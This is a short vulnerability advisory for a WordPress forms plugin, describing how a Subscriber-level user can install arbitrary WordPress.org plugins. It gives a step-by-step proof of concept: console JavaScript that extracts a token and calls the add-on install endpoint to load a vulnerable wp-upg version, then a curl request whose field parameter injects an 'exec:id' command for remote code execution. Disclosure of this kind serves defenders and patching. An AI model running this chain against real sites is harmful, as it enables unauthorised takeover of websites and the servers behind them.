The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome`
2. Run the following JavaScript code in the browser console:
var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` );
3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.
4. For RCE with the `wp-upg` plugin, run the following `curl` command:
curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'